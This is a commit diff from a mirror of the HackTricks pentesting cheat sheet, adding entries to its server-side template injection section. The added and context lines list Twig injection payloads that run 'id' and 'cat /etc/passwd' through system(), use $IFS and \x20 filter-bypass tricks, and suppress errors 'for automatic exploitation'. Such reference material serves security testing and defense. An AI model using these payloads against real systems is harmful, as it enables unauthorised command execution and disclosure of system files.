mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
Update README.md
This commit is contained in:
parent
e06db461f7
commit
ab550dc115
1 changed files with 4 additions and 0 deletions
|
@ -538,6 +538,10 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1
|
|||
{{['id']|filter('system')}}
|
||||
{{['cat\x20/etc/passwd']|filter('system')}}
|
||||
{{['cat$IFS/etc/passwd']|filter('system')}}
|
||||
{{['id',""]|sort('system')}}
|
||||
|
||||
#Hide warnings and errors for automatic exploitation
|
||||
{{["error_reporting", "0"]|sort("ini_set")}}
|
||||
```
|
||||
|
||||
**Twig - Template format**
|
||||
|
|
Loading…
Reference in a new issue